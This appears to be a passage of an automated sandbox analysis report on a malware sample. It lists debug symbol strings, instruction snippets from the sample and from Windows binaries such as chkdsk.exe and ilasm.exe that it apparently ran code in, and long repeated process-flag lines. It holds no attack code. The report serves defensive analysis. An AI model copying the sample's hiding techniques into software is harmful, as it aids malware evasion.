Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uwZgUlCQSPVT.exe, 0000000A.00000000.1789081369.00000000009FE000.00000002.00000001.01000000.00000008.sdmp, uwZgUlCQSPVT.exe, 00000010.00000000.1937713826.00000000009FE000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: System.Drawing.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Management.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdb source: ilasm.exe, 00000005.00000002.1869476562.0000000005658000.00000004.00000020.00020000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000003.1808867290.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdbP source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr

Source: H25iQbxCki.exe

Static PE information: 0xAFEE3FE3 [Sat Jul 14 08:18:43 2063 UTC]

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B88B31A push eax; iretd	0_2_00007FFD9B88B339
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B887150 push ebx; retf 0008h	0_2_00007FFD9B887151
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B8800BD pushad ; iretd	0_2_00007FFD9B8800C1
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B897672 push eax; retf	0_2_00007FFD9B897673
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B96026B push esp; retf 4810h	0_2_00007FFD9B960312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00414074 push eax; retf	5_2_00414173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00412002 push esp; retf	5_2_00412043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00414138 push eax; retf	5_2_00414173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004039F0 push eax; ret	5_2_004039F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004239A3 push edi; ret	5_2_004239AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004052EB push es; ret	5_2_004052F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00425B23 push edi; ret	5_2_00425B2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00405664 push esp; retf	5_2_0040567A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00411788 push esp; ret	5_2_00411789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00411FB3 push esp; retf	5_2_00412043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB09AD push ecx; mov dword ptr [esp], ecx	5_2_05BB09B6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050209AD push ecx; mov dword ptr [esp], ecx	12_2_050209B6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456E5C0 push esp; retf	12_2_0456E650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456E600 push esp; retf	12_2_0456E650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04582130 push edi; ret	12_2_0458213B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04561C71 push esp; retf	12_2_04561C87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0457FDC3 push ss; iretd	12_2_0457FDD4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456DD95 push esp; ret	12_2_0456DD96
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0457FFB0 push edi; ret	12_2_0457FFB8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0457FFA7 push edi; ret	12_2_0457FFB8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_045618F8 push es; ret	12_2_045618FD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0457A90C push 69F0026Ch; retf	12_2_0457A91B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0457AA4D pushad ; retf	12_2_0457AA6A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04580B9C push cs; iretd	12_2_04580BD0
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B72285 push ss; iretd	16_2_02B72296
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B60A82 push esp; retf	16_2_02B60B12

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
